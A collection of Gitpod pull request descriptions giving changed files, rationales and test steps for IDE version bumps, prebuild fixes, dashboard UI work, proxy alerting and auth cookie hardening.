- Fix nightly VS Code Browser rewrite stable version images
- Fix gha script
- Fix JetBrains' test opened more than 4 workspaces at a time
Fixes ENT-320
- Code image will be rebuild
- Start workspace with latest code, its version should be `1.90.2`
**Test installer changes**
```
cd /workspace/gitpod/install/installer
go run main.go config init --overwrite --log-level=error
docker run --rm eu.gcr.io/gitpod-core-dev/build/versions:main-gha.26675 cat /versions.yaml > versions.yaml
go run main.go ide-configmap --debug-version-file ./versions.yaml
```
<ul>
<li><b>🏷️ Name</b> - hw-fix-ide</li>
<li><b>🔗 URL</b> - <a href="https://hw-fix-ide.preview.gitpod-dev.com/workspaces" …
> Fix nightly VS Code Browser rewrite stable version images

- components/server/src/init.ts
- dev/preview/workflow/preview/deploy-gitpod.sh
- install/installer/pkg/components/server/deployment.go
- install/installer/pkg/config/v1/experimental/experimental.go
Push this from feature flag into config
Related: ENT-270
Fixes: ENT-312
- `kubectl get deployment/server -o yaml | grep GOOGLE_` and verify that the value is `true` :heavy_check_mark: 
<ul>
<li><b>🏷️ Name</b> - gpl-ff-config</li>
<li><b>🔗 URL</b> - <a href="https://gpl-ff-config.preview.gitpod-dev.com/workspaces" target="_blank">gpl-ff-config.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - gpl-ff-config-gha.26467</li> …
> [server] Move ff google_cloud_profiler into env var/installer config

- components/ide/gha-update-image/lib/code-pin-version.ts
- components/ide/gha-update-image/lib/common.ts
Fixes #
Open this PR with Gitpod
```
cd /workspace/gitpod/components/ide/gha-update-image
npm i -g bun
yarn
bun run index-code.ts
bun run index-jb.ts
```
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [gha] fix nit bugs of IDE images update

- .github/workflows/jetbrains-updates.yml
- components/ide/gha-update-image/lib/code-pin-version.ts
- components/ide/gha-update-image/lib/jb-pin-version.ts
Fixes #
Check GHA ouput and created PRs
- https://github.com/gitpod-io/gitpod/actions/runs/9609860551 
- https://github.com/gitpod-io/gitpod/actions/runs/9609858860
**PR**
- Code https://github.com/gitpod-io/gitpod/pull/19952
- JetBrains https://github.com/gitpod-io/gitpod/pull/19953
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
Saves cost. Untick this only if you're …
> [gha] correct images to use

- operations/observability/mixins/meta/rules/proxy.yaml
Now, if we've violated five 9's, then we'll trigger...but not before (which is what has been happening lately).
Ref: https://gitpod.slack.com/archives/C01TNS8EVQT/p1718979601030609?thread_ts=1718961427.787819&cid=C01TNS8EVQT
Related to ENT-268
You can see we would not have triggered lately (since we started emitting this Caddy metric recently):
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [obs] reduce potential for ProxyBadGateway to trigger

- install/installer/pkg/components/ide-service/ide-configmap.json
Update code to `1.90.2`
<ul>
<li><b>📦 Version</b> - ide-code-release-gha.26792</li> …
> [VS Code Browser] Update stable code to `1.90.2`

- components/gitpod-cli/cmd/timeout-set.go
Fixes #
```bash
cd components/gitpod-cli && go run . timeout set --help
```
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> Update cmd name in `gp timeout set` example

- components/public-api/typescript-common/fixtures/toPrebuild_1.golden
- components/public-api/typescript-common/fixtures/toPrebuild_1.json
- components/public-api/typescript-common/src/public-api-converter.ts
- components/supervisor/pkg/supervisor/config.go
Enable displaying JB warmup tasks in the Prebuilds detail, just like any other task.
Fixes ENT-172
https://ft-jb-warmup-in-ui.preview.gitpod-dev.com/prebuilds/
Try triggering a prebuild with a repo such as https://github.com/gitpod-samples/spring-petclinic.
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
Saves cost. Untick this only if you're really sure you need a …
> Enable displaying JB warmup tasks in the Prebuilds UI

- components/server/src/messaging/redis-subscriber.ts
- components/ws-daemon/pkg/controller/workspace_controller.go
- components/ws-manager-bridge/src/container-module.ts
- components/ws-manager-bridge/src/prebuild-state-mapper.spec.ts
- components/ws-manager-bridge/src/prebuild-state-mapper.ts
- components/ws-manager-bridge/src/prebuild-updater.ts
This PR fixes an issue where if you watched updates on a prebuild, there would:
1. Be multiple done results
2. The optional error would not be included
Fixes ENT-317
Fixes ENT-319
1. Run a prebuild on a repo exiting with a non-zero exit code, like https://github.com/gitpod-io/browser-extension (at least I've got an excuse for not fixing that :) and stay on the prebuilds list
2. Observe the status of the Running prebuild changes to `Failing` instead of `Ready`.
https://ft-fix-optbb5fb8acbd.preview.gitpod-dev.com/prebuilds
gitpod:summary
<details>
</details>
<details>
</details>
<details> …
> Fix dropped errors on available prebuilds

- components/proxy/plugins/analytics/analytics.go
The default ErrorHandler for `httputil.NewSingleHostReverseProxy` returns 502 status codes. Let us instead return a 503 status code for the /analytics endpoint. 
Why? This will help us trigger the [ProxyBadGateway](https://github.com/gitpod-io/gitpod-dedicated/blob/main/ops/telemetry/alerts/proxy.yaml) alert less often, ideally when there are proxy failures breaking the user experience.
Background:
It fires more often in Enterprise, for /analytics/v1/batch, which routes to telemetry-exporter (and then to Firehose and S3), but is likely having trouble with telemetry-exporter. 
More background:
I checked the logs for telemetry-exporter and could not find a record of a failure. Therefore, I opted for this change, so as to make the ProxyBadGateway alert more valuable by excluding /analytics …
> [proxy] return 503 for /analytics errors, instead of 502

- components/gitpod-protocol/src/util/gitpod-host-url.ts
- components/server/go/pkg/lib/cookie.go
- components/server/src/auth/generic-auth-provider.ts
- components/server/src/auth/login-completion-handler.ts
- components/server/src/prometheus-metrics.ts
- components/server/src/session-handler.spec.db.ts
- components/server/src/session-handler.ts
- components/server/src/test/service-testing-container-module.ts
- components/server/src/user/user-controller.ts
- components/ws-proxy/pkg/proxy/routes.go
- components/ws-proxy/pkg/proxy/routes_test.go
- install/installer/pkg/components/auth/config_test.go
- install/installer/pkg/components/public-api-server/configmap_test.go
- install/installer/pkg/components/server/configmap_test.go
Make use of a host-only cookie for the main JWT.
Related to https://gitpod.slack.com/archives/C079V6H3JSW.
https://ft-playing3314cc781a.preview.gitpod-dev.com
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> Make auth cookie stricter

- .devcontainer/Dockerfile
The container image build fails otherwise
Fixes n/a
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [.devcontainer] fix container build

- components/common-go/experiments/flags.go
- components/server/src/workspace/workspace-starter.ts
- components/supervisor/pkg/supervisor/config.go
- components/supervisor/pkg/supervisor/supervisor.go
- components/supervisor/pkg/supervisor/supervisor_test.go
Fixes ENT-356
**Java Env is set**
- Create a task with simple `init: env`, it should print correct `JAVA_TOOL_OPTIONS`
✅ <img width="1649" alt="image" src="https://github.com/gitpod-io/gitpod/assets/20944364/1891e605-2c59-4883-8d2f-49cb6845557f">
**No regression**
- Test *How to Test* section on https://github.com/gitpod-io/gitpod/pull/19905
✅ <img width="830" alt="image" src="https://github.com/gitpod-io/gitpod/assets/20944364/dc577a33-caa9-4831-818c-aab2c32cb178">
<ul>
<li><b>🏷️ Name</b> - hw-java-env</li>
<li><b>🔗 URL</b> - <a href="https://hw-java-env.preview.gitpod-dev.com/workspaces" target="_blank">hw-java-env.preview.gitpod-dev.com/workspaces</a>.</li> …
> Get java feature flags from server

- .github/workflows/code-nightly.yml
Prepare `1.91` release
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [VS Code Browser] switch nightly job to `1.91`

- components/server/src/github/github-context-parser.ts
Improve logging to diagnose when repos can not be found:
* Log Graphql queries when repositories are not found.
* Log Graphql errors.
Fixes # (internal incident)
<ul>
<li><b>🏷️ Name</b> - me-log</li>
<li><b>🔗 URL</b> - <a href="https://me-log.preview.gitpod-dev.com/workspaces" target="_blank">me-log.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - me_log-gha.27003</li>
<li><b>🗒️ Logs</b> - <a href="https://console.cloud.google.com/logs/query;query=jsonP …
> Log query if repo is not found

- components/supervisor/leeway.Dockerfile
- components/supervisor/openssh/leeway.Dockerfile
- components/supervisor/pkg/supervisor/ssh.go
Fixes ENT-366
1. start a workspace from this preview env
2. try to connect workspace via ssh
<ul>
<li><b>🏷️ Name</b> - pd-openssh</li>
<li><b>🔗 URL</b> - <a href="https://pd-openssh.preview.gitpod-dev.com/workspaces" target="_blank">pd-openssh.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - pd-openssh-gha.27048</li>
<li><b>🗒️ Logs</b> - <a href="https://console.cloud.google.com/logs/query;query=jsonPayload.kubernetes.host%3D%22preview-pd-openssh%22%0A% …
> [openssh] upgrade openssh to v9.8p1

- .devcontainer/Dockerfile
- components/dashboard/src/components/PendingChangesDropdown.tsx
- components/dashboard/src/workspaces/WorkspaceEntry.tsx
- components/dashboard/src/workspaces/WorkspacesSearchBar.tsx
Lift the notion of pinned workspaces.
Fixes https://linear.app/gitpod/issue/ENT-360/visually-lift-pinned-workspaces
<ul>
<li><b>🏷️ Name</b> - se-pin-lift</li>
<li><b>🔗 URL</b> - <a href="https://se-pin-lift.preview.gitpod-dev.com/workspaces" target="_blank">se-pin-lift.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - se-pin-lift-gha.27045</li>
<li><b>🗒️ Logs</b> - <a href="https://console.cloud.google.com/logs/query;query=jsonPayload.kubernetes.host%3D% …
> [Dashboard] Show pinned status of workspaces

- components/dashboard/src/prebuilds/detail/PrebuildDetailPage.tsx
- components/ws-daemon/pkg/controller/workspace_controller.go
Running:
Available (failed or success):
Fixes ENT-355
- register a repository, e.g. github.com/geropl/gitpod-test-repo
- trigger a prebuild on a branch with a task that **fails**
- use the "Open Debug Workspace" button to start a workspace based on that prebuild
- see that it contains the prebuild logs under `/workspace/.gitpod/` :heavy_check_mark: 
<ul>
<li><b>🏷️ Name</b> - gpl-backup72272f1a76</li>
<li><b>🔗 URL</b> - <a href="https://gpl-backup72272f1a76.preview.gitpod-dev.com/workspaces" target="_blank">gpl-backup72272f1a76.preview.gitpod-dev.com/workspaces</a>.</li> …
> [ws-manager] Don't skip content backup for failed prebuilds

- components/ws-daemon/nsinsider/main.go
Do not create fuse device if it already exists. We will use the generic device plugin and a custom fuse resource in the future to create the fuse device. It will allow us to get rid of modifying the eBPF program that was created by runc in order to allow access to the device. Modifying the eBPF program has the side effect that changes to the eBPF program will get lost if other components also need to overwrite it.
Fixes ENT-338
- Open workspace and check that fuse device is still accessible
- You can use the following program for the check
```
#define _GNU_SOURCE
#include <unistd.h>
#include <sys/syscall.h>
#include <linux/fs.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
int main() {
const char* src_path = "/dev/fuse";
unsigned int flags = O_RDWR; …
```
> Do not create fuse device if it already exists

- dev/preview/infrastructure/modules/gce/variables.tf
- dev/preview/infrastructure/variables.tf
Update image for gen115
Fixes n/a
Start a workspace:
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [preview] Update for gen115

- components/dashboard/src/workspaces/EmptyWorkspacesContent.tsx
This PR updates the copy texts for the empty `/workspaces` page. The changes include updating the text in the heading and subheading, as well as updating the text in the buttons. The goal is to provide clearer and more concise instructions to users on how to create their first workspace or try a demo repository.
| <img width="1314" alt="image" src="https://github.com/gitpod-io/gitpod/assets/55068936/1715cede-4461-4884-8c11-bd84658d403f"> | ![image](https://github.com/gitpod-io/gitpod/assets/55068936/4761c8f1-0fc8-4921-a1f0-ef61f62636d4) | 
Fixes OPM-663
- Open preview environment
- Complete onboarding
- And, see `/workspaces` :eyes:
gitpod:summary
<details> …
> [dashboard] chore: Update copy texts for empty `/workspaces` page

- components/dashboard/src/components/RepositoryFinder.tsx
This PR adds functionality to include predefined repositories in the search results on `/new` (previously it was only for `/new?showExamples=true`. This allows users to easily find and select predefined repositories based on their search query. Related #19991
| ![image](https://github.com/gitpod-io/gitpod/assets/55068936/ccac24af-1828-47d5-a293-11ffedce4b1d) | ![image](https://github.com/gitpod-io/gitpod/assets/55068936/d577c718-9235-406d-9270-3bfcfcba9738) | 
|<img width="786" alt="image" src="https://github.com/gitpod-io/gitpod/assets/55068936/a7099950-8571-49af-be29-f7f9f4991c3a">|![image](https://github.com/gitpod-io/gitpod/assets/55068936/debce4a8-9c7b-4a65-b481-a8e165438095)|
Fixes OPM-664
- Open preview environment & complete onboarding.
- Go …
> [dashboard] feat: Add predefined repositories to `/new`

- components/dashboard/src/workspaces/WorkspaceEntry.tsx
- components/dashboard/src/workspaces/WorkspaceOverflowMenu.tsx
- Some layout fixes for the workspace entry
- fix the :merge:  icon: it's there, but hidden - likely due to the longer branch name
- in the "column" for GitStatus, right-align the "change" drop-down to make the layout more stable
- grant gitStatus + startTime + pin + action more than 50% of the width
- remove the rename action (for now)
Fixes #
<ul>
<li><b>🏷️ Name</b> - se-follow-up-pinning</li>
<li><b>🔗 URL</b> - <a href="https://se-follow-up-pinning.preview.gitpod-dev.com/workspaces" target="_blank">se-follow-up-pinning.preview.gitpod-dev.com/workspaces</a>.</li> …
> [dashboard] minor fixes for pinning changes

- install/installer/pkg/components/ide-service/ide-configmap.json
Update code to `1.91.0`
<ul>
<li><b>📦 Version</b> - ide-code-release-gha.27188</li> …
> [VS Code Browser] Update stable code to `1.91.0`

- components/ide/jetbrains/backend-plugin/src/main/resources/META-INF/plugin.xml
Relates [private chat](https://gitpod.slack.com/archives/C02BRJLGPGF/p1720426529071279?thread_ts=1719407126.426709&cid=C02BRJLGPGF)
Fixes ENT-426
- Open workspace with latest and stable IntelliJ IDEA + repo https://github.com/Gitpod-Samples/spring-petclinic
- Tasks terminals should attached
✅ 
|Stable|Latest|
|:-:|:-:|
|<img width="1271" alt="SCR-20240709-dgpw" src="https://github.com/gitpod-io/gitpod/assets/20944364/e9df170a-ee89-42fe-b186-8588cdddea04">|<img width="1068" alt="image" src="https://github.com/gitpod-io/gitpod/assets/20944364/3da116c0-0f96-48fc-b86d-ae9e7072a360">|
<ul>
<li><b>🏷️ Name</b> - hw-jb-terminal</li>
<li><b>🔗 URL</b> - <a href="https://hw-jb-terminal.preview.gitpod-dev.com/workspaces" …
> [JetBrains] fix latest terminal integration broken

- components/ee/agent-smith/pkg/agent/agent.go
[agent-smith] don't scrub infringement
Fixes [[internal chat](https://gitpod.slack.com/archives/C071G5TTS49/p1720511691831099?thread_ts=1720511254.975759&cid=C071G5TTS49)]
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [agent-smith] don't scrub infringement

- components/dashboard/src/components/PendingChangesDropdown.tsx
This PR updates the Pending Changes dropdown component to improve the menu styling. The changes include adjusting the overflow behavior of the menu.
| <img width="284" alt="image" src="https://github.com/gitpod-io/gitpod/assets/55068936/e5a11e9c-ee9d-44c1-a329-f9ac586c033e"> | <img width="313" alt="image" src="https://github.com/gitpod-io/gitpod/assets/55068936/6e520740-2aad-43db-90f3-22cbec76d643"> | 
Fixes #
- Open preview environment & Complete onboarding
- Start a new workspace, make 7-8 new files
- Go back to preview environment dashboard (`/workspaces`) and see `Changes` dropdown section 👀
<ul>
<li><b>🏷️ Name</b> - fix-pendin42c008ef7e</li> …
> [dashboard] Update Pending changes dropdown component to improve menu styling

- components/dashboard/src/components/ItemsList.tsx
- components/dashboard/src/workspaces/WorkspaceEntry.tsx
Improve layout of workspace entries.
Fixes https://linear.app/gitpod/issue/ENT-449/[dashboard]-properly-align-columns-in-workspace-list
<ul>
<li><b>🏷️ Name</b> - se-ws-impr</li>
<li><b>🔗 URL</b> - <a href="https://se-ws-impr.preview.gitpod-dev.com/workspaces" target="_blank">se-ws-impr.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - se-ws-impr-gha.27270</li>
<li><b>🗒️ Logs</b> - <a href="https://console.cloud.google.com/logs/query;query=jsonPayload.kub …
> [dashboard] imporved workspace entry layout

- components/dashboard/src/start/StartWorkspace.tsx
- components/dashboard/src/workspaces/DeleteWorkspaceModal.tsx
- components/dashboard/src/workspaces/RenameWorkspaceModal.tsx
- components/dashboard/src/workspaces/WorkspaceEntry.tsx
- components/dashboard/src/workspaces/WorkspaceOverflowMenu.tsx
Allow naming workspaces
Fixes https://linear.app/gitpod/issue/ENT-434/allow-naming-workspaces
<ul>
<li><b>🏷️ Name</b> - se-name-ws</li>
<li><b>🔗 URL</b> - <a href="https://se-name-ws.preview.gitpod-dev.com/workspaces" target="_blank">se-name-ws.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - se-name-ws-gha.27285</li>
<li><b>🗒️ Logs</b> - <a href="https://console.cloud.google.com/logs/query;query=jsonPayload.kubernetes.host%3D%22preview-se-name-ws%22%0A …
> [dashboard] enable naming of workspaces

- components/dashboard/package.json
- components/dashboard/src/prebuilds/detail/PrebuildDetailPage.tsx
- components/dashboard/src/workspaces/EmptyWorkspacesContent.tsx
- yarn.lock
Make the youtube embed more performant using https://github.com/paulirish/lite-youtube-embed, make the view responsive and simplify event.
A cool article about yt embeds: https://www.zachleat.com/web/youtube-embeds/.
This change almost cuts the pages size in half when the user does not click on the video.
Fixes ENT-451
https://ft-yt-improvements.preview.gitpod-dev.com/workspaces
You should see the page right away after signing up.
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
<summary>Preview Environment / Integration …
> Improve empty workspace view

- components/dashboard/src/components/PendingChangesDropdown.tsx
- components/dashboard/src/start/StartWorkspace.tsx
- components/dashboard/src/workspaces/WorkspacesSearchBar.tsx
- yarn.lock
Fixes a regression from #19992 which made the dropdown for git changes incorrectly aligned on the start workspace page.
| Old | New |
| <img width="359" alt="image" src="https://github.com/gitpod-io/gitpod/assets/29888641/8ad7bc2f-9af2-44da-aaf8-dbfaeb1edd45"> | <img width="1920" alt="image" src="https://github.com/gitpod-io/gitpod/assets/29888641/5581da1e-2e0a-48ff-bb01-0b4208fe52c3"> | 
It also fixes a focusing issue on the new workspace button and updates the caniuse database, which we haven't done in a while.
https://ft-fix-cha41e1198b65.preview.gitpod-dev.com/workspaces
Start a workspace, touch a file, stop it and observe the page's UI.
gitpod:summary
<details> …
> Fix changes dropdown alignment

- components/dashboard/src/workspaces/WorkspaceEntry.tsx
Makes the workspace pinning action keyboard-focusable and operable. Gets rid of a clickable div :)
https://ft-proper-27456213ee.preview.gitpod-dev.com/workspaces
/hold
> Accessible workspace pinning

- .github/workflows/code-nightly.yml
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> Revert nightly job to use release `1.91`

- components/server/src/bitbucket-server/bitbucket-server-context-parser.spec.ts
- components/server/src/bitbucket-server/bitbucket-server-context-parser.ts
Allow users to open a specific tag directly from Bitbucket Server.
Fixes ENT-372
1. [Join my org](https://ft-bb-server-tags.preview.gitpod-dev.com/orgs/join?inviteId=6476c50b-6a8c-4899-8f4a-5f12c3615d1a)
2. Try opening https://bitbucket.gitpod-dev.com/users/filip/repos/repodepo/browse?at=refs%2Ftags%2Fv0.0.1
--- Or ---
Run the test in `components/server`
```
mocha './**/bitbucket-server/bitbucket-server-context-parser.spec.js' --grep 'test_tag_context_01' --exclude './node_modules/**' --exit
```
(although you'll need an access token and to change the host at the top of the file)
> Add support for opening bitbucket server tags

- WORKSPACE.yaml
Build code version `1.91.1` (`4fa372442f1a89e59e0330a6b09f087b0713323c`)
<ul> …
> [VS Code Browser] Build stable code `1.91.1`

- components/local-app/BUILD.js
We accidentally changed all builds to build for `amd64` and this PR fixes that.
Fixes ENT-325
```
wget https://ide.ft-fix-cli-arch.preview.gitpod-dev.com/static/bin/gitpod-cli-darwin-arm64
file gitpod-cli-darwin-arm64
```
Check it's `arm64`
```
/.../gitpod-cli-darwin-arm64: Mach-O 64-bit executable arm64
```
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
Saves cost. …
> Fix Gitpod CLI arm builds

- install/installer/pkg/components/ide-service/ide-configmap.json
Update code to `1.91.1`
<ul>
<li><b>📦 Version</b> - ide-code-release-gha.27436</li> …
> [VS Code Browser] Update stable code to `1.91.1`

- .github/workflows/code-nightly.yml
- WORKSPACE.yaml
- components/server/src/workspace/workspace-starter.ts
- install/installer/pkg/components/blobserve/configmap.go
Changes on openvscode-server side https://github.com/gitpod-io/openvscode-server/commit/2915f0a1347a12df8b19641d99235395705efb53
TODO:
Fixes ENT-453, ENT-455
**Night code is working again**
- With debug commit https://github.com/gitpod-io/gitpod/pull/20029/commits/be496bc04a55152b0e29cbc3ea36d3ab0b374195
- You should be able to open workspace with **latest Editor** in preview env
**Switch editor version is working**
- Open a workspace with latest editor
- Close workspace
- Update setting to use `stable` editor
- Restart workspace
- Workspace should use stable editor
<ul>
<li><b>🏷️ Name</b> - hw-code-latest</li>
<li><b>🔗 URL</b> - <a href="https://hw-code-latest.preview.gitpod-dev.com/workspaces" …
> Fix not able to open workspace with nightly code

- components/dashboard/src/components/Modal.tsx
Makes tall modals scrollable
| ![image](https://github.com/user-attachments/assets/8b3130c7-121e-4583-94ee-c55d5926284e) | ![image](https://github.com/user-attachments/assets/4dd2ffdd-b896-446a-8762-707ea43d9599) | 
Fixes ENT-310
https://ft-fix-modals.preview.gitpod-dev.com/workspaces
Open the org settings, go to `Policies`, find the editor management modal and resize your viewport to not fit all options.
> Fix very tall modals

- components/dashboard/src/onboarding/job-roles.ts
`Platform or Developer Experience` became `DevOps / Platform / DevX` in Onboarding form job roles dropdown by keeping the key same as `enabling` (that is being used in DB)
Fixes OPM-670
_Just don't 🙃_
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [dashboard] Update `enabling` role

- components/server/src/workspace/workspace-starter.ts
This PR adds a conditionally-applied `prebuildTriggerStrategy` to the `workspace_started` segment event. This will help us to monitor the adoption of #20006.
Fixes ENT-458
1. In the preview environment, open a workspace
2. Open Staging Trusted in Segment
3. Configure the repository with prebuilds and run one manually
4. Create a second workspace and look for it in Segment again, now it should contain a `prebuildTriggerStrategy` in the payload. 
<ul>
<li><b>🏷️ Name</b> - ft-track-p2913faa72e</li>
<li><b>🔗 URL</b> - <a href="https://ft-track-p2913faa72e.preview.gitpod-dev.com/workspaces" target="_blank">ft-track-p2913faa72e.preview.gitpod-dev.com/workspaces</a>.</li> …
> Track used prebuild strategy with started repositories

- components/server/src/prebuilds/prebuild-manager.ts
- components/server/src/workspace/workspace-service.ts
- components/supervisor/pkg/supervisor/tasks.go
Fixes permission discrepancies with prebuilds the user did not start themselves.
Fixes ENT-474
Fixes ENT-481, although a bit lazily 
https://ft-fix-sto5f07d12d0f.preview.gitpod-dev.com
1. [Join my org](https://ft-fix-sto5f07d12d0f.preview.gitpod-dev.com/orgs/join?inviteId=9e5093d1-d3ea-48b4-a4bd-fbf6380bc6c5)
2. Call me and make me run a prebuild
3. Try cancelling it
I did step 2-3 for you with a second account and can confirm cancelling works :).
/hold
> Fix permissions checks for stopping prebuilds

- components/dashboard/src/data/prebuilds/prebuild-queries.ts
- components/dashboard/src/prebuilds/detail/PrebuildDetailPage.tsx
- components/dashboard/src/prebuilds/list/RunPrebuildModal.tsx
The method for triggering a new prebuild is currently a query, because it made it integrating into the UI easier. That came with some unintended consequences in caching though, hence this PR which converts it into a standard mutation.
What happened is that for some reason, the query we used with `cacheTime: 0` still kept some cache for quite some time, meaning that going to prebuilds which were not the latest one caused the cache to retrieve the latest triggered prebuild id and redirect to it. This to the user looked like the prebuild they just clicked on was behaving weirdly without status updates, but in fact it was a completely different prebuild.
Fixes ENT-471
https://ft-fix-pre38d051c02d.preview.gitpod-dev.com/repositories
1. Import a repository and set it up for prebuilds
2. Run a …
> Fix incorrect redirects to newer prebuilds

- components/server/src/oauth-server/db.ts
Fixes #
Once build is passed
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [TB] add OAuth entry

- components/dashboard/src/components/RepositoryFinder.tsx
Makes it so that users don't think they can run prebuilds on repositories they did not import.
Fixes ENT-487
https://ft-no-examb7f8b4ba3a.preview.gitpod-dev.com/prebuilds
1. Go to the prebuilds page
2. Try to run a prebuild
3. Observe there are no sample repos to choose
/hold
> Don't show repo examples around prebuilds

- components/dashboard/src/prebuilds/detail/PrebuildTaskTab.tsx
| When there's an image build | When there's none |
| <img width="819" alt="image" src="https://github.com/user-attachments/assets/4dfde8f6-a63b-4f07-b95c-af41099d08a4"> | <img width="819" alt="image" src="https://github.com/user-attachments/assets/fef76498-1b73-4f1b-bfe2-16e519f99a1e"> | 
Fixes ENT-490
https://ft-infer-pb90972c503.preview.gitpod-dev.com/repositories
1. Import a repo, enable prebuilds
2. Run a prebuild, maybe observe image logs or see our new message (depending on whether the preview env has the image you need)
3. Repeat if desired
> Be more helpful when there is no image build for prebuilds

- components/dashboard/src/prebuilds/detail/PrebuildDetailPage.tsx
Looks good now: 
Fixes ENT-500
- join this org: https://gpl-undefi8254afba9e.preview.gitpod-dev.com/orgs/join?inviteId=fcdbfbdb-4e92-4595-a227-09be337e0f33
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
Valid options are `all`, `workspace`, `webapp`, `ide`, `jetbrains`, `vscode`, `ssh`. …
> [dashboard] Fix duration displaying (no "undefinedh")

- WORKSPACE.yaml
- components/ide/xterm/leeway.Dockerfile
Bump the Browser Terminal to https://github.com/gitpod-io/xterm-web-ide/tree/07a9b1389960c840f7adca3f4321c5b417f9178a.
Removes the reliability of websockets and updates many dependencies.
1. Open a repo with the Browser Terminal
2. 🤷‍♂️
<ul>
<li><b>🏷️ Name</b> - ft-update-xterm</li>
<li><b>🔗 URL</b> - <a href="https://ft-update-xterm.preview.gitpod-dev.com/workspaces" target="_blank">ft-update-xterm.preview.gitpod-dev.com/workspaces</a>.</li> …
> Bump xterm IDE

- WORKSPACE.yaml
Bumps xterm to https://github.com/gitpod-io/xterm-web-ide/commit/8f10c5febf0162a3c2309076302f770fbad38fde
This is vaguely related to ENT-505
https://ft-bump-xterm.preview.gitpod-dev.com/workspaces
1. Try to open some project with the Browser Terminal IDE
2. Visit /version inside the workspace and verify the commit is `8f10c5febf0162a3c2309076302f770fbad38fde`
> Bump xterm

- components/dashboard/src/components/PrebuildLogs.tsx
- components/dashboard/src/components/WorkspaceLogs.tsx
- components/dashboard/src/data/prebuilds/prebuild-logs-emitter.ts
- components/dashboard/src/prebuilds/detail/PrebuildTaskTab.tsx
- components/dashboard/src/start/StartWorkspace.tsx
- components/gitpod-protocol/src/protocol.ts
- components/server/src/prebuilds/prebuild-manager.ts
- components/server/src/workspace/headless-log-controller.ts
- components/server/src/workspace/headless-log-service.ts
- components/server/src/workspace/workspace-service.ts
- components/supervisor/pkg/supervisor/services.go
This PR fixes multiple issues:
- [3b6ac9c](https://github.com/gitpod-io/gitpod/pull/20062/commits/3b6ac9c6ef558dcb24beea4829b4b568bd16ade1): removes (yet another) race in supervisor which might have lead to us not sending the last piece(s) of a log
- [835ec3a](https://github.com/gitpod-io/gitpod/pull/20062/commits/835ec3a23ce963a0ede559cac954216745e77930):
- forward the bytes array (`UInt8Array`) directly to xterm, instead of converting it to a `string` between: This could "chop" terminal control characters in between, leading to weird behavior like in ENT-528
- ensure we close the response only after we completed pushing every chunk in the queue [[1](https://github.com/gitpod-io/gitpod/blob/e5003ecdd0ad04c26e50bc9df787e644546eccb1/components/server/src/workspace/headless-log-controller.ts …
> [supervisor] Make sure we read the last chunk of message when task is closed

- .github/workflows/code-nightly.yml
Another part of https://github.com/gitpod-io/openvscode-releases/commit/94ccee58792fcdcb4709dabbf5e4b3627680b874
Relates https://linear.app/gitpod/issue/ENT-532/
No need to test
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> Switch code nightly job to `1.92`

- .idea/gradle.xml
- .idea/misc.xml
- components/ide/jetbrains/gateway-plugin/.gitignore
- components/ide/jetbrains/gateway-plugin/BUILD.yaml
- components/ide/jetbrains/gateway-plugin/build.gradle-latest.kts
- components/ide/jetbrains/gateway-plugin/build.gradle-stable.kts
- components/ide/jetbrains/gateway-plugin/build.gradle.kts
- components/ide/jetbrains/gateway-plugin/gradle-latest.properties
- components/ide/jetbrains/gateway-plugin/gradle.properties
- components/ide/jetbrains/gateway-plugin/gradle/wrapper/gradle-wrapper.properties
- components/ide/jetbrains/gateway-plugin/src/main/kotlin/io/gitpod/jetbrains/gateway/GitpodConnectionProvider.kt
- components/ide/jetbrains/gateway-plugin/src/main/kotlin/io/gitpod/jetbrains/gateway/GitpodConnectorView.kt
- components/ide/jetbrains/gateway-plugin/src/main/kotlin/io/gitpod/jetbrains/gateway/GitpodRecentConnections.kt
- components/ide/jetbrains/gateway-plugin/src/main/kotlin/io/gitpod/jetbrains/gateway/GitpodStartWorkspaceView.kt
- components/ide/jetbrains/gateway-plugin/src/main/kotlin/io/gitpod/jetbrains/gateway/GitpodWorkspacesView.kt
Fixes ENT-533
**Works on 2024.2**
- Download **latest** version of Gitpod Plugin (contains `hw-gw-mig`) in `Dev` channel https://plugins.jetbrains.com/plugin/18438-gitpod-gateway/edit/versions/dev
- Install Plugin manually with **Gateway 2024.2** [^1]
- Try to create a workspace inside Gateway, it should be able to create and connect
- Open a workspace with IntelliJ IDEA, and click `Open in IDEA` button from dashboard, Gateway should be able to connect to it
**Compatible with 2024.1**
Download **stable** version and test with **Gateway 2024.1** like previous test steps, it should work like before
[^1]: <img width="962" alt="image" src="https://github.com/user-attachments/assets/4b4b2e41-2f48-4133-a892-623dd6ed1ea6">
gitpod:summary
<details> …
> Migrate JetBrains Gateway Plugin to `2024.2`

- components/ide/jetbrains/gateway-plugin/build.gradle-latest.kts
- components/ide/jetbrains/gateway-plugin/build.gradle.kts
Fixes ENT-562
Review the code
gitpod:summary
<details>
</details>
